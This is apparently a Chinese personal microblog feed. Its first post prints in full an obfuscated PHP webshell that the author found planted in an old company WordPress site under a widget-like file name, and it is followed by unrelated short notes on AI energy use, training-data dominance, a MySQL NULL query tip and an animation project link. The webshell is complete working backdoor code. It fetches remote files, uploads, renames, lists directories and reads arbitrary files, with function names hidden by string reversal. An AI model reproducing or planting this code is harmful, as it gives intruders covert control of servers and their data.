公司一个古早系统2021年的攻击脚本:wp-admin/js/widgets/media-audio-widget.php
<?php error_reporting(0);$sr=”st”./*+/*+*/”rr”/*+/*+*/.”ev”;$id=$sr/*+/*+*/(“ri”.”d_”.”si”);$rn=$sr/*+/*+*/(“em”.”an”.”er”);$dn=$sr/*+/*+*/(“em”.”anr”.”id”);$od=$sr/*+/*+*/(“ri”.”dne”.”po”);$rd=$sr/*+/*+*/(“ri”.”dda”.”er”);$cd=$sr/*+/*+*/(“ri”.”deso”.”lc”);$fpc=$sr/*+/*+*/(“stn”.”etn”.”oc_t”.”up_e”.”lif”);$fgc=$sr/*+/*+*/(“stn”.”etn”.”oc_t”.”eg_e”.”lif”);$muf=$sr/*+/*+*/(“eli”.”f_d”.”eda”.”olp”.”u_e”.”vom”);$dlform='<form method=”post”>FN:<input name=”fn” size=”20″ type=”text”>URL:<input name=”url” size=”50″ type=”text”><input type=”submit” value=”ok”></form>’;$ulform='<form method=”post” enctype=”multipart/form-data”><input name=”uf” type=”file”>SP:<input name=”sp” size=”50″ type=”text”><input type=”submit” value=”ok”></form>’;$rnform='<form method=”post”>ON:<input name=”on” size=”50″ type=”text”>NN:<input name=”nn” size=”50″ type=”text”><input type=”submit” value=”ok”></form>’;$lpform='<form method=”post”>DP:<input name=”dp” size=”50″ type=”text”><input type=”submit” value=”ok”></form>’;$sfform='<form method=”post”>DF:<input name=”df” size=”50″ type=”text”><input type=”submit” value=”ok”></form>’;if($_GET[‘act’]==’dl’){echo($dlform);if($_SERVER[‘REQUEST_METHOD’]==’POST’){$fpc/*+/*+*/($_POST[‘fn’],$fgc/*+/*+*/($_POST[‘url’]));}exit;}if($_GET[‘act’]==’ul’){echo($ulform);if($_SERVER[‘REQUEST_METHOD’]==’POST’){$sp=empty($_POST[‘sp’])?’./’:$_POST[‘sp’].’/’;$muf/*+/*+*/($/*+/*+*/{“_F”.”IL”.”ES”}[“uf”][“tmp_name”],$sp.$/*+/*+*/{“_F”.”IL”.”ES”}[“uf”][“name”]);}exit;}if($_GET[‘act’]==’rn’){echo($rnform);if($_SERVER[‘REQUEST_METHOD’]==’POST’){$rn/*+/*+*/($_POST[‘on’],$_POST[‘nn’]);}exit;}if($_GET[‘act’]==’gp’){echo($dn/*+/*+*/(__FILE__));exit;}if($_GET[‘act’]==’lp’){echo($lpform);if($_SERVER[‘REQUEST_METHOD’]==’POST’){$dp=$_POST[‘dp’].’/’;$h=$od/*+/*+*/($dp);while(($fn=$rd/*+/*+*/($h))!==false){if($id/*+/*+*/($dp.$fn)){$t1.=’D ’.$fn.'<br>’;}else{$t2.=’ ’.$fn.'<br>’;}}$cd/*+/*+*/($dp);echo($dp.'<br>’.$t1.$t2);}exit;}if($_GET[‘act’]==’sf’){echo($sfform);if($_SERVER[‘REQUEST_METHOD’]==’POST’){$df=$_POST[‘df’];echo(‘<textarea style=”width:100%;height:100%;” wrap=”off”>’.$fgc/*+/*+*/($df).'</textarea>’);}exit;}?>
吓得我赶紧查了查有没有被黑
结果咨询后得到的回复是:
好吧,再见了百度
前沿科技总是能源消耗大户,前有挖矿大军,今有如“ChatGPT日耗电超50万度”之类的AI 巨头,以我浅显的知识维持人脑运算的能源需求应该是远低于这些显卡的,不考虑道德问题,未来是否有可能有脑机接口发展到一定程度时这些科技巨头反向租赁人脑的算力?纯属脑洞……
关于人工智能有一个有意思的观点,姑且称之为“数据量决定论”,就是目前人工智能大家都在 PK 超参的数量以及背后训练的数据量。所以未来是否有可能由于Python 和 C 代码在量上的决定性优势导致其它的编程语言逐步被边缘化,且也无法出现新编程语言的增长?类似地,由于英文资料的统治性地位,是否在人类语言上也逐步转向英文主导的现象?
在很多系统里都使用了 MySQL,但我今天才知道对于数字类型的字段使用!=如status != 1是无法查询到字段值为null的行的,如需查询出null行,就需要使用NOT status <=> 1
开源地址:https://github.com/magic-research/magic-animate
在线演示(项目太热,当前未必能生成):https://huggingface.co/spaces/zcxu-eric/magicanimate
有时喜欢考古,不知是信息茧房还是什么原因,感觉很多事都被大众遗忘了。
另外发现人的大脑可能真的不适合处理太多东西,这解释了为什么到处都是二元对立